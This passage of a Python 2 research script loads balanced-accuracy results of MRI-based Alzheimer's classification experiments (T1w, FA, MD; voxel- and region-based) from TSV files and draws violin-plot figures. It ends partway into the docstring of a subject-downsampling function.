### transfer the list into an array with this shape: n_iterations*n_tasks_imbalanced
metric = np.array(results_balanced_acc_md_imbalanced).transpose()
## define the size of th image
line_coll = ax[1].violinplot(metric, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[1].legend(legend, loc='upper right', fontsize=10)
ax[1].grid(axis='y', which='major', linestyle='dotted')
ax[1].set_xticks([1.5, 4.5, 7.5, 10.5])
ax[1].set_yticks([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
ax[1].set_xticklabels(ticklabels_imbalanced, rotation=0, fontsize=15) # 'vertical'
ax[1].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric, 0)
std = np.std(metric, 0)
inds = np.array(pos)
ax[1].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[1].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[1].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[1].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[1].set_ylim(0.1, 1)
ax[1].set_title('D: MD Region-based classifications', fontsize=15)
plt.savefig(os.path.join(classification_result_path,
'region_violin_imbalanced.png'), additional_artists=plt.legend,
bbox_inches="tight")
else:
print "Plot for balanced classifications"
## get FA
for task in tasks_balanced:
for atlas in atlases:
balanced_accuracy = []
tsvs_path = os.path.join(classification_result_path, 'RandomBalanced',
task + '_RB_' + atlas, 'fa')
for k in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(k), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_fa_balanced.append(balanced_accuracy)
## get MD
for task in tasks_balanced:
for atlas in atlases:
balanced_accuracy = []
tsvs_path = os.path.join(classification_result_path, 'RandomBalanced',
task + '_RB_' + atlas, 'md')
for k in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(k), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_md_balanced.append(balanced_accuracy)
##### FA
### transfer the list into an array with this shape: n_iterations*n_tasks_balanced
metric = np.array(results_balanced_acc_fa_balanced).transpose()
## define the violin's postions
pos = [1, 2, 4, 5, 7, 8]
color = ['#FF0000', '#87CEFA'] * len(tasks_imbalanced) # red, blue and green
legend = ['JHULabel', 'JHUTract']
## define the size of th image
fig, ax = plt.subplots(2, figsize=[15, 10])
line_coll = ax[0].violinplot(metric, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[0].legend(legend, loc='upper right', fontsize=10, frameon=True)
ax[0].grid(axis='y', which='major', linestyle='dotted')
ax[0].set_xticks([1.5, 4.5, 7.5, 10.5])
ax[0].set_xticklabels(ticklabels_balanced, rotation=0, fontsize=15) # 'vertical'
ax[0].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric, 0)
std = np.std(metric, 0)
inds = np.array(pos)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].set_ylim(0.1, 1)
ax[0].set_title('C: FA Region-based classification with balanced data', fontsize=15)
##### MD
### transfer the list into an array with this shape: n_iterations*n_tasks_balanced
metric = np.array(results_balanced_acc_md_balanced).transpose()
## define the size of th image
line_coll = ax[1].violinplot(metric, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[1].legend(legend, loc='upper right', fontsize=10, frameon=True)
ax[1].grid(axis='y', which='major', linestyle='dotted')
ax[1].set_xticks([1.5, 4.5, 7.5, 10.5])
ax[1].set_xticklabels(ticklabels_balanced, rotation=0, fontsize=15) # 'vertical'
ax[1].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric, 0)
std = np.std(metric, 0)
inds = np.array(pos)
ax[1].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[1].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[1].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[1].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[1].set_ylim(0.1, 1)
ax[1].set_title('D: MD Region-based classification with balanced data', fontsize=15)
plt.savefig(os.path.join(classification_result_path,
'region_violin_balanced.png'), additional_artists=plt.legend,
bbox_inches="tight")
print 'finish DWI'
elif modality == 'T1':
results_balanced_acc_voxel_imbalanced = []
results_balanced_acc_regional_imbalanced = []
tissue_combinations = ['GM+WM']
ticklabels_imbalanced = [i.replace('_', ' ') for i in tasks_imbalanced]
if raw_classification == True:
print "Plot for original classification, to compare T1 with DWI, we use GM+WM"
## T1
for task in tasks_imbalanced:
tsvs_path = os.path.join(classification_result_path, task + '_VB_T1_fwhm_8')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_voxel_imbalanced.append(balanced_accuracy)
## GM+WM FA
for task in tasks_imbalanced:
for tissue in tissue_combinations:
tsvs_path = os.path.join(classification_result_path,
task + '_VB_' + tissue + '_0.3_8', 'fa')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_voxel_imbalanced.append(balanced_accuracy)
## GM+WM MD
for task in tasks_imbalanced:
for tissue in tissue_combinations:
tsvs_path = os.path.join(classification_result_path,
task + '_VB_' + tissue + '_0.3_8', 'md')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_voxel_imbalanced.append(balanced_accuracy)
### transfer the list into an array with this shape: n_iterations*n_tasks_imbalanced
metric = np.array(results_balanced_acc_voxel_imbalanced).transpose()
## reorder the order of the column to make sure the right order in the image
metric_new = metric[:, [0, 4, 8, 1, 5, 9, 2, 6, 10, 3, 7, 11]]
## define the violin's postions
pos = [1, 2, 3, 5, 6, 7, 9, 10, 11, 13, 14, 15]
color = ['#FF0000', '#87CEFA', '#90EE90'] * len(tasks_imbalanced) # red, blue and green
legend = ['T1w+GM', 'DTI+GM+FA', 'DTI+GM+MD']
## define the size of th image
fig, ax = plt.subplots(2, figsize=[15, 10])
line_coll = ax[0].violinplot(metric_new, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[0].legend(legend, loc='upper right', fontsize=10, frameon=True)
ax[0].grid(axis='y', which='major', linestyle='dotted')
ax[0].set_xticks([2, 6, 10, 14])
ax[0].set_yticks([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
ax[0].set_xticklabels(ticklabels_imbalanced, rotation=0, fontsize=15) # 'vertical'
ax[0].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric_new, 0)
std = np.std(metric_new, 0)
inds = np.array(pos)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].set_ylim(0.1, 1)
ax[0].set_title('A: Voxel-based classifications for T1w and diffusion MRI', fontsize=15)
### T1 atlaes
atlases_T1 = ['AAL2']
for task in tasks_imbalanced:
for atlas in atlases_T1:
tsvs_path = os.path.join(classification_result_path, task + '_RB_T1_' + atlas)
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_regional_imbalanced.append(balanced_accuracy)
atlases_DTI = ['JHUDTI81']
## get DTI atlases FA
for task in tasks_imbalanced:
for atlas in atlases_DTI:
tsvs_path = os.path.join(classification_result_path, task + '_RB_' + atlas, 'fa')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_regional_imbalanced.append(balanced_accuracy)
#
# ## get DTI atlases MD
# for task in tasks_imbalanced:
# for atlas in atlases_DTI:
# tsvs_path = os.path.join(classification_result_path, task + '_RB_' + atlas, 'md')
# balanced_accuracy = []
# for i in xrange(n_iterations):
# result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
# if os.path.isfile(result_tsv):
# balanced_accuracy.append(
# (pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
# else:
# raise OSError(
# errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
# results_balanced_acc_regional_imbalanced.append(balanced_accuracy)
##### FAs
### transfer the list into an array with this shape: n_iterations*n_tasks_imbalanced
metric = np.array(results_balanced_acc_regional_imbalanced).transpose()
## reorder the order of the column to make sure the right order in the image
metric_new = metric[:, [0, 4, 1, 5, 2, 6, 3, 7]]
## define the violin's postions
pos = [1, 2, 4, 5, 7, 8, 10, 11]
color = ['#FF0000', '#87CEFA'] * len(tasks_imbalanced) # red, blue and green
legend = ['T1w+AAL2', 'DTI+JHULabel+FA']
## define the size of th image
line_coll = ax[1].violinplot(metric_new, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[1].legend(legend, loc='upper right', fontsize=10, frameon=True)
ax[1].grid(axis='y', which='major', linestyle='dotted')
ax[1].set_xticks([1.5, 4.5, 7.5, 10.5])
ax[1].set_yticks([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
ax[1].set_xticklabels(ticklabels_imbalanced, rotation=0, fontsize=15) # 'vertical'
ax[1].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric_new, 0)
std = np.std(metric_new, 0)
inds = np.array(pos)
ax[1].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[1].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[1].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[1].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[1].set_ylim(0.1, 1)
ax[1].set_title('B: Region-based classifications for T1w and diffusion MRI', fontsize=15)
plt.savefig(os.path.join(classification_result_path,
'violin_T1_compare_dwi.png'), additional_artists=plt.legend,
bbox_inches="tight")
#
print 'finish T1'
else:
pass
if figure_number == 3:
results_acc_fa_voxel = []
results_acc_md_voxel = []
results_acc_fa_region = []
if feature_type == 'voxel':
tissue_combinations = ['GM_WM']
ticklabels_imbalanced = [i.replace('_', ' ') for i in tasks_imbalanced]
# ticklabels_imbalanced = ['CN vs AD', 'CN_vs_MCI', 'CN_vs_pMCI', 'sMCI_vs_pMCI']
ticklabels_balanced = [i.replace('_', ' ') for i in tasks_balanced]
# ticklabels_balanced = ['CN_vs_MCI', 'CN_vs_pMCI', 'sMCI_vs_pMCI']
atlases = ['JHUDTI81']
print "Plot for figure 3"
## for region
## get FA region imbalanced
for task in tasks_imbalanced:
for atlas in atlases:
tsvs_path = os.path.join(classification_result_path, task + '_RB_' + atlas, 'fa')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_acc_fa_region.append(balanced_accuracy)
## get FA region balanced
for task in tasks_balanced:
for atlas in atlases:
balanced_accuracy = []
tsvs_path = os.path.join(classification_result_path, 'RandomBalanced',
task + '_RB_' + atlas, 'fa')
for k in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(k), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_acc_fa_region.append(balanced_accuracy)
##### FAs
### transfer the list into an array with this shape: n_iterations*n_tasks_imbalanced
metric = np.array(results_acc_fa_region).transpose()
metric = metric[:, [0, 3, 1, 4, 2, 5]]
## define the violin's postions
pos = [1, 2, 4, 5, 7, 8]
# color = ['#FF0000', '#87CEFA', '#90EE90'] * len(tasks_imbalanced) # red, blue and green
color = ['#FF0000', '#87CEFA'] * len(tasks_imbalanced) # red, blue
legend = ['JHULabel_raw', 'JHUTract_balanced']
## define the size of th image
fig, ax = plt.subplots(2, figsize=[15, 10])
line_coll = ax[0].violinplot(metric, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[0].legend(legend, loc='upper right', fontsize=10, frameon=True)
ax[0].grid(axis='y', which='major', linestyle='dotted')
ax[0].set_xticks([1.5, 4.5, 7.5])
ax[0].set_yticks([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
ax[0].set_xticklabels(ticklabels_balanced, rotation=0, fontsize=15) # 'vertical'
ax[0].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric, 0)
std = np.std(metric, 0)
inds = np.array(pos)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].set_ylim(0.1, 1)
ax[0].set_title('C: FA Region-based classifications', fontsize=15)
plt.savefig(os.path.join(classification_result_path,
'figure3_C.png'), additional_artists=plt.legend,
bbox_inches="tight")
### for voxel
## get FA raw
for task in tasks_imbalanced:
for tissue in tissue_combinations:
tsvs_path = os.path.join(classification_result_path, task + '_VB_' + tissue + '_0.3_8', 'fa')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_acc_fa_voxel.append(balanced_accuracy)
## get MD raw
for task in tasks_imbalanced:
for tissue in tissue_combinations:
tsvs_path = os.path.join(classification_result_path, task + '_VB_' + tissue + '_0.3_8', 'md')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_acc_md_voxel.append(balanced_accuracy)
## get FA balanced
for task in tasks_balanced:
for tissue in tissue_combinations:
balanced_accuracy = []
tsvs_path = os.path.join(classification_result_path, 'RandomBalanced',
task + '_VB_' + tissue + '_0.3_8', 'fa')
for k in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(k), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_acc_fa_voxel.append(balanced_accuracy)
## get MD balanced
for task in tasks_balanced:
for tissue in tissue_combinations:
balanced_accuracy = []
tsvs_path = os.path.join(classification_result_path, 'RandomBalanced',
task + '_VB_' + tissue + '_0.3_8', 'md')
for k in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(k), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_acc_md_voxel.append(balanced_accuracy)
##### FAs
### transfer the list into an array with this shape: n_iterations*n_tasks_imbalanced
metric = np.array(results_acc_fa_voxel).transpose()
metric = metric[:, [0, 3, 1, 4, 2, 5]]
## define the violin's postions
# pos = [1, 2, 3, 5, 6, 7, 9, 10, 11, 13, 14, 15]
pos = [1, 2, 4, 5, 7, 8]
# color = ['#FF0000', '#87CEFA', '#90EE90'] * len(tasks_imbalanced) # red, blue and green
color = ['#FF0000', '#87CEFA'] * len(tasks_imbalanced) # red, blue and green
legend = ['GM+WM_raw', 'GM+WM_balanced']
## define the size of th image
fig, ax = plt.subplots(2, figsize=[15, 10])
line_coll = ax[0].violinplot(metric, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[0].legend(legend, loc='upper right', fontsize=10, frameon=True)
ax[0].grid(axis='y', which='major', linestyle='dotted')
ax[0].set_xticks([1.5, 4.5, 7.5])
ax[0].set_yticks([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
ax[0].set_xticklabels(ticklabels_balanced, rotation=0, fontsize=15) # 'vertical'
ax[0].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric, 0)
std = np.std(metric, 0)
inds = np.array(pos)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].set_ylim(0.1, 1)
ax[0].set_title('A: FA Voxel-based classifications', fontsize=15)
##### MD
### transfer the list into an array with this shape: n_iterations*n_tasks_imbalanced
metric = np.array(results_acc_md_voxel).transpose()
metric = metric[:, [0, 3, 1, 4, 2, 5]]
## define the size of th image
line_coll = ax[1].violinplot(metric, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[1].legend(legend, loc='upper right', fontsize=10, frameon=True)
ax[1].grid(axis='y', which='major', linestyle='dotted')
ax[1].set_xticks([1.5, 4.5, 7.5])
ax[1].set_yticks([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
ax[1].set_xticklabels(ticklabels_balanced, rotation=0, fontsize=15) # 'vertical'
ax[1].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric, 0)
std = np.std(metric, 0)
inds = np.array(pos)
ax[1].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[1].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[1].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[1].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[1].set_ylim(0.1, 1)
ax[1].set_title('B: MD Voxel-based classifications', fontsize=15)
plt.savefig(os.path.join(classification_result_path,
'figure3_AB.png'), additional_artists=plt.legend,
bbox_inches="tight")
print 'finish Figure 3'
elif figure_number == 4:
results_balanced_acc_voxel_imbalanced = []
results_balanced_acc_regional_imbalanced = []
tissue_combinations = ['GM_WM']
ticklabels_imbalanced = [i.replace('_', ' ') for i in tasks_imbalanced]
if raw_classification == True:
print "Plot for original classification, to compare T1 with DWI, we use GM+WM"
## T1
for task in tasks_imbalanced:
tsvs_path = os.path.join(classification_result_path, task + '_VB_T1_fwhm_8')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_voxel_imbalanced.append(balanced_accuracy)
## GM+WM FA
for task in tasks_imbalanced:
for tissue in tissue_combinations:
tsvs_path = os.path.join(classification_result_path,
task + '_VB_' + tissue + '_0.3_8', 'fa')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_voxel_imbalanced.append(balanced_accuracy)
## GM+WM MD
for task in tasks_imbalanced:
for tissue in tissue_combinations:
tsvs_path = os.path.join(classification_result_path,
task + '_VB_' + tissue + '_0.3_8', 'md')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_voxel_imbalanced.append(balanced_accuracy)
### transfer the list into an array with this shape: n_iterations*n_tasks_imbalanced
metric = np.array(results_balanced_acc_voxel_imbalanced).transpose()
## reorder the order of the column to make sure the right order in the image
metric_new = metric[:, [0, 4, 8, 1, 5, 9, 2, 6, 10, 3, 7, 11]]
## define the violin's postions
pos = [1, 2, 3, 5, 6, 7, 9, 10, 11, 13, 14, 15]
color = ['#FF0000', '#87CEFA', '#90EE90'] * len(tasks_imbalanced) # red, blue and green
legend = ['GM-T1w', 'GM+WM-FA', 'GM+WM-MD']
## define the size of th image
fig, ax = plt.subplots(2, figsize=[15, 10])
line_coll = ax[0].violinplot(metric_new, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[0].legend(legend, loc='upper right', fontsize=10, frameon=True)
ax[0].grid(axis='y', which='major', linestyle='dotted')
ax[0].set_xticks([2, 6, 10, 14])
ax[0].set_yticks([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
ax[0].set_xticklabels(ticklabels_imbalanced, rotation=0, fontsize=15) # 'vertical'
ax[0].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric_new, 0)
std = np.std(metric_new, 0)
inds = np.array(pos)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].set_ylim(0.1, 1)
ax[0].set_title('A: Voxel-based classifications for T1w and diffusion MRI', fontsize=15)
### T1 atlaes
atlases_T1 = ['AAL2']
for task in tasks_imbalanced:
for atlas in atlases_T1:
tsvs_path = os.path.join(classification_result_path, task + '_RB_T1_' + atlas)
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_regional_imbalanced.append(balanced_accuracy)
atlases_DTI = ['JHUDTI81']
## get DTI atlases FA
for task in tasks_imbalanced:
for atlas in atlases_DTI:
tsvs_path = os.path.join(classification_result_path, task + '_RB_' + atlas, 'fa')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_regional_imbalanced.append(balanced_accuracy)
#
# ## get DTI atlases MD
# for task in tasks_imbalanced:
# for atlas in atlases_DTI:
# tsvs_path = os.path.join(classification_result_path, task + '_RB_' + atlas, 'md')
# balanced_accuracy = []
# for i in xrange(n_iterations):
# result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
# if os.path.isfile(result_tsv):
# balanced_accuracy.append(
# (pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
# else:
# raise OSError(
# errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
# results_balanced_acc_regional_imbalanced.append(balanced_accuracy)
##### FAs
### transfer the list into an array with this shape: n_iterations*n_tasks_imbalanced
metric = np.array(results_balanced_acc_regional_imbalanced).transpose()
## reorder the order of the column to make sure the right order in the image
metric_new = metric[:, [0, 4, 1, 5, 2, 6, 3, 7]]
## define the violin's postions
pos = [1, 2, 4, 5, 7, 8, 10, 11]
color = ['#FF0000', '#87CEFA'] * len(tasks_imbalanced) # red, blue and green
legend = ['AAL2-T1w', 'JHULabel-FA']
## define the size of th image
line_coll = ax[1].violinplot(metric_new, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[1].legend(legend, loc='upper right', fontsize=10, frameon=True)
ax[1].grid(axis='y', which='major', linestyle='dotted')
ax[1].set_xticks([1.5, 4.5, 7.5, 10.5])
ax[1].set_yticks([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
ax[1].set_xticklabels(ticklabels_imbalanced, rotation=0, fontsize=15) # 'vertical'
ax[1].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric_new, 0)
std = np.std(metric_new, 0)
inds = np.array(pos)
ax[1].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[1].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[1].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[1].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[1].set_ylim(0.1, 1)
ax[1].set_title('B: Region-based classifications for T1w and diffusion MRI', fontsize=15)
plt.savefig(os.path.join(classification_result_path,
'violin_T1_compare_dwi.png'), additional_artists=plt.legend,
bbox_inches="tight")
#
print 'finish T1'
def random_donsample_subjects(diagnoses_tsv, n=None):
    """
    Randomly downsample the majority diagnosis group to the size of the minority group.

    Reads the diagnoses TSV (must contain 'participant_id', 'session_id' and
    'diagnosis' columns), drops randomly-chosen rows of the majority class so
    both classes have the same count, writes the balanced table next to the
    input file (as '<name>_balanced.tsv', or '<name>_<n>_balanced.tsv' when n
    is given) unless that file already exists, and returns the balanced lists.

    :param diagnoses_tsv: path to the diagnoses TSV file.
    :param n: optional integer tag inserted into the output file name
              (the balanced table itself is identical either way).
